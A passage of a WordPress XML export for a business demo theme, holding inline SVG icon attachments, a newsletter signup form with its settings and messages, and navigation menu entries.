		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bars-chart.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1413</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 08:57:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 08:57:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bars-chart]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bars-chart.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/bars-chart.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>rocket</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/rocket/</link>
		<pubDate>Mon, 07 Dec 2020 08:58:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/rocket.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1414</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 08:58:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 08:58:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[rocket]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/rocket.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/rocket.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>badge</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/badge-2/</link>
		<pubDate>Mon, 07 Dec 2020 08:58:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/badge-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1415</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 08:58:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 08:58:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[badge-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/badge-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/badge-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><g id="XMLID_2590_"><g id="XMLID_212_"><path id="XMLID_215_" d="m460.459 441.32-86.206-149.314c31.891-30.919 51.747-74.184 51.747-122.006 0-93.738-76.261-170-170-170s-170 76.262-170 170c0 47.822 19.856 91.087 51.748 122.007l-86.207 149.313c-2.023 3.505-1.735 7.884.731 11.093 2.465 3.208 6.622 4.614 10.531 3.563l66.454-17.904 17.722 66.503c1.042 3.911 4.338 6.808 8.351 7.339.44.058.879.087 1.315.087 3.538 0 6.855-1.88 8.657-5l90.698-157.095 90.698 157.094c1.802 3.121 5.12 5 8.657 5 .436 0 .875-.029 1.315-.087 4.012-.531 7.309-3.428 8.351-7.339l17.722-66.503 66.455 17.904c3.91 1.054 8.065-.354 10.531-3.563 2.466-3.208 2.754-7.587.73-11.092zm-354.459-271.32c0-82.71 67.29-150 150-150s150 67.29 150 150-67.29 150-150 150-150-67.29-150-150zm54.076 306.052-14.075-52.819c-.684-2.567-2.362-4.757-4.663-6.085-2.301-1.329-5.035-1.687-7.602-.996l-52.78 14.22 72.221-125.089c24.355 18.556 53.844 30.7 85.933 33.88zm218.188-59.901c-2.567-.691-5.301-.333-7.602.996s-3.979 3.518-4.663 6.085l-14.075 52.819-79.034-136.89c32.089-3.18 61.578-15.324 85.933-33.88l72.22 125.09z"></path><path id="XMLID_885_" d="m193.352 149.609c-2.131 6.565-.384 13.635 4.56 18.451l15.992 15.581-3.769 22.006c-1.165 6.803 1.581 13.548 7.166 17.604 3.155 2.291 6.844 3.454 10.559 3.454 2.862 0 5.739-.691 8.397-2.089l19.759-10.395 19.765 10.384c6.11 3.21 13.374 2.684 18.956-1.375 5.583-4.058 8.325-10.805 7.156-17.607l-3.78-22.005 15.984-15.589c4.941-4.819 6.684-11.89 4.55-18.453-2.135-6.563-7.704-11.256-14.534-12.247l-22.096-3.205-9.886-20.019c-3.056-6.188-9.239-10.03-16.139-10.03-.001 0-.003 0-.005 0-6.901.002-13.085 3.848-16.139 10.038l-9.875 20.024-22.094 3.217c-6.829.996-12.396 5.691-14.527 12.255zm44.706 3.563c3.257-.474 6.072-2.521 7.528-5.472l10.408-21.104 10.42 21.099c1.458 2.951 4.274 4.996 7.531 5.468l23.289 3.378-16.846 16.43c-2.356 2.298-3.431 5.608-2.874 8.852l3.984 23.192-20.832-10.945c-2.913-1.531-6.394-1.53-9.307.002l-20.826 10.956 3.972-23.194c.556-3.244-.521-6.554-2.878-8.851l-16.855-16.421z"></path><path id="XMLID_887_" d="m256 296c69.477 0 126-56.523 126-126 0-51.209-30.58-96.935-77.906-116.493-5.108-2.112-10.953.318-13.061 5.422-2.109 5.104.318 10.952 5.422 13.061 39.817 16.455 65.545 54.927 65.545 98.01 0 58.449-47.551 106-106 106s-106-47.551-106-106c0-43.186 25.812-81.692 65.759-98.098 5.109-2.098 7.55-7.941 5.452-13.049-2.099-5.109-7.94-7.549-13.049-5.452-47.482 19.501-78.162 65.268-78.162 116.599 0 69.477 56.524 126 126 126z"></path><path id="XMLID_888_" d="m256.13 64c2.63 0 5.21-1.07 7.07-2.93s2.93-4.44 2.93-7.07-1.07-5.21-2.93-7.07-4.44-2.93-7.07-2.93-5.21 1.07-7.07 2.93c-1.87 1.86-2.93 4.44-2.93 7.07s1.06 5.21 2.93 7.07c1.86 1.86 4.44 2.93 7.07 2.93z"></path></g></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz/?elementor_library=default-kit</link>
		<pubDate>Thu, 03 Sep 2020 08:41:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>5</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 08:41:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 08:41:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.4]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Footer Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz/mc4wp-form/footer-form/</link>
		<pubDate>Fri, 04 Sep 2020 03:54:07 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/mc4wp-form/footer-form/</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="subscribe-inner-form">
    <input type="email" name="EMAIL" placeholder="Your Email *" required />
	<button type="submit" class="subscribe-btn-icon"><i class="ot-flaticon-trajectory"></i></button>
</div>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>325</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 03:54:07]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 03:54:07]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[mc4wp-form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_mc4wp_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:15:"required_fields";s:5:"EMAIL";s:12:"double_optin";s:1:"1";s:15:"update_existing";s:1:"0";s:17:"replace_interests";s:1:"1";s:15:"subscriber_tags";s:0:"";s:18:"hide_after_success";s:1:"0";s:8:"redirect";s:0:"";s:3:"css";s:1:"0";s:5:"lists";a:0:{}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Thank you, your sign-up request was successful! Please check your email inbox to confirm.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_invalid_email]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please provide a valid email address.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_required_field_missing]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please fill in the required fields.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_already_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Given email address is already subscribed, thank you!]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_error]]></wp:meta_key>
		<wp:meta_value><![CDATA[Oops. Something went wrong. Please try again later.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_unsubscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[You were successfully unsubscribed.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_not_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Given email address is not subscribed.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_no_lists_selected]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please select at least one list.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_updated]]></wp:meta_key>
		<wp:meta_value><![CDATA[Thank you, your records have been updated!]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-28]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Pages</title>
		<link>http://wpdemo.archiwp.com/maxbizz/pages/</link>
		<pubDate>Thu, 03 Sep 2020 09:54:29 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=363</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>363</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:54:29]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:54:29]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pages]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>2</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[custom]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[363]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[custom]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/758/</link>
		<pubDate>Thu, 10 Sep 2020 09:27:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=758</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>758</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:27:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:27:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[758]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>12</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[363]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[597]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/759/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=759</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>759</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[759]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>3</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[363]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[487]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/760/</link>
		<pubDate>Thu, 10 Sep 2020 09:27:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=760</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>760</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:27:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:27:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[760]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>13</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[363]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[604]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
